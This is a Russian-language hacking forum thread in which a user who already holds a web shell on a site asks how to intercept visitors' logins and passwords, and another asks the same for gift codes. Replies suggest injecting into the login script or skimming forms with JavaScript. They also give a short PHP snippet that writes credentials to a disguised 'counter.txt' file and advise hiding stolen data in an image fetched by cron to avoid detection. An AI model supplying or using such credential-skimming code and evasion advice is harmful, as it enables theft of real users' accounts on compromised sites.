установка сниффера

Discussion in 'Уязвимости' started by reuvenmatbil, 27 Mar 2015.

  1. reuvenmatbil

    reuvenmatbil New Member

    Joined:
    1 Sep 2012
    Messages:
    29
    Likes Received:
    4
    Reputations:
    0
    имею шелл на сайте.
    необходимо перехватывать логин и пароли юзеров чтоб они шли на впс


    в какую сторону начинать копать чтобы реализовать задумку?
     
  2. KIR@PRO

    [email protected] Active Member

    Joined:
    26 Dec 2007
    Messages:
    823
    Likes Received:
    287
    Reputations:
    359
    инжект в скрипт авторизации, если есть соответствующие права на файл...
     
    _________________________
  3. QwEQwE

    QwEQwE New Member

    Joined:
    10 May 2015
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    так же интересует данный вопрос. Может кто то пример показать. Имеется шелл, идет ввод гифт кода, напишите примерный код, для того, чтобы введеные данные уходили ко мне на ВПС.
    Так же прошу помощи по php, какие функции поизучать, чтобы ствить подобого рода снифера?
    (чтобы ореентироватся в коде, какие параметры смотреть, как смотреть, что передается какой командой и тд. ) Спс заранее за помощь и ответы
     
  4. blaga

    blaga Elder - Старейшина

    Joined:
    23 Mar 2006
    Messages:
    884
    Likes Received:
    273
    Reputations:
    106
    можно использовать два метода. первый - это просто грабим данные из форм посредством javaScript и ajax
    второй - грабим переменные из php и их уже коипруем\отправляем на сервак.
    кстати я бы не стал слать данные на свой серв, т.к. при обнаружении сниффера ваш серв спалят сразу же.
    лучше данные писать в неприметный файл, например картинку и потом с сервера по крону скачивать эту картинку.
     
  5. Black Diver

    Black Diver Member

    Joined:
    20 Mar 2009
    Messages:
    89
    Likes Received:
    21
    Reputations:
    5
    Например можно писать все переменные логина в файл и расположить его в удобном неприметном месте для скачивания.
    Для этого в скрипт авторизации (после получения переменных с логином/паролем) вставляем код в стиле (код писался на коленке):
    PHP:
    $f fopen('counter.txt''a');
    fwrite($f$login_var.'\n');
    fwrite($f$pass_var.'\n');
    fclose($f);
    где counter.txt это имя файла, $login_var и $pass_var - переменные из оригинального скрипта с логином и паролем а \n - перевод строки
     
    blaga likes this.
Loading...